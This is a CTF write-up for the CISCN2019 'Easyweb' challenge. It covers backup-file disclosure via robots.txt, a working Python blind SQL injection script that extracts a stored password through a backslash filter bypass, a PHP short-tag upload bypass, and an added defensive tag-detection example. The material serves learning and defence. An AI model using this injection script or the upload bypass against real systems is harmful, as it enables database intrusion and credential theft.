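Challenge log: [CISCN2019 Finals Day2 Web1] Easyweb
Challenge reproduction link: https://buuoj.cn/challenges
Reference: BUUCTF writeups (may be abandoned at any time)
I. Knowledge points covered
1. Sensitive file disclosure
Requesting robots.txt reveals image.php.bak.
2. Filter bypass and SQL injection
The script: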
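import requests

# Target instance from the write-up (BUUOJ reproduction environment).
url = r'http://6873d13e-5f19-42e4-bb8f-dec6d9acdeb3.node1.buuoj.cn/image.php'
result = ''

# MySQL substr() positions are 1-based, so start at 1 rather than 0.
for x in range(1, 100):
    high = 127
    low = 32
    mid = (low + high) // 2
    # Binary search over the printable ASCII range for character x.
    while high > low:
        payload = " or id=if(ascii(substr((select password from users limit 1 offset 0),%d,1))>%d,1,0)#" % (x, mid)
        params = {
            'id': '\\\\0',
            'path': payload
        }
        response = requests.get(url, params=params)
        # A JPEG (JFIF marker) in the response means the condition was true.
        if b'JFIF' in response.content:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    result += chr(int(mid))
    print(result)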
3. File upload: bypassing the php filter with short tags
When PHP short tags are enabled, i.e. short_open_tag=on, <?=$_?> can be used to output a variable.
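The filter gap described in point 3, seen from the defending side. This is an added example, not code from the challenge or the original write-up. The form of the naive filter, the function names and the sample inputs are assumptions made for illustration.

```python
import re

def naive_filter_allows(data: bytes) -> bool:
    """Assumed form of the bypassed filter: reject only the literal 'php'."""
    return b"php" not in data.lower()

# Every byte sequence that switches the PHP parser into code mode.
# Order matters: the longer tags must be tried before the bare "<?".
PHP_OPEN = re.compile(
    rb"(?P<full><\?php)"      # <?php
    rb"|(?P<echo><\?=)"       # <?=  (PHP >= 5.4 accepts it even with short_open_tag=off)
    rb"|(?P<short><\?)"       # <?   (needs short_open_tag=on)
    rb"|(?P<script><script[^>]*language\s*=\s*[\"']?php)",  # PHP 5 only, removed in PHP 7
    re.IGNORECASE,
)

def find_php_open_tags(data: bytes):
    """Return [(offset, kind)] for each PHP open tag found in data."""
    return [(m.start(), m.lastgroup) for m in PHP_OPEN.finditer(data)]

def strict_filter_allows(data: bytes) -> bool:
    """Reject any input containing a sequence PHP would treat as an open tag."""
    return not find_php_open_tags(data)

# Constructed samples (not taken from the challenge).
SAMPLES = {
    "full_tag":  b"<?php echo 1; ?>",
    "echo_tag":  b"<?=$_?>",          # the form quoted in point 3
    "short_tag": b"<? echo 1; ?>",
    "plain":     b"holiday-photo.jpg",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name,
              "naive allows:", naive_filter_allows(data),
              "strict allows:", strict_filter_allows(data),
              find_php_open_tags(data))
```

Matching on open tags is a backstop. The stronger control is to make sure user-controlled bytes never land in a file or path that the PHP interpreter will execute.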